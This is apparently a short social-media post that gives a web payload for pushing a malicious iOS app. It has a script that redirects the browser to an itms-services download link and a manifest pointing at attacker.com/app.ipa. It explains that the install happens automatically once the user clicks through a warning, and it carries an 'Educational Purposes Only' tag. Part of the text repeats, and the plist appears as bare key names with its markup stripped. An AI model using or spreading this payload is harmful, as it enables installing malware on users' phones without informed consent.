Saturday 22 | 02:24:PM
Twitter.com/ClumsyLulz
<script> document . location . href = " itms-services://?action=download-manifest&url=https://example.com/manifest.plist " ; </script>
In the manifest.plist file, include your malicious app's URL:
items
assets
kind
software-package
url
https://attacker.com/app.ipa
metadata
bundle-identifier
com.attacker.app
bundle-version
1.0
kind
software
title
App
This will automatically download and install the app.
The problem is that the user will receive a warning:
"The developer has not received Apple's approval to use this capability."
This is because the app has not been signed with an Enterprise certificate.
If the user proceeds, the app will still be installed.
// Educational Purposes Only!
<script> document . location . href = " itms-services://?action=download-manifest&url=https://example.com/manifest.plist " ; </script>
In the manifest.plist file, include your malicious app's URL:
This will automatically download and install the app.
The problem is that the user will receive a warning:
"The developer has not received Apple's approval to use this capability."
This is because the app has not been signed with an Enterprise certificate.
If the user proceeds, the app will still be installed.
// Educational Purposes Only!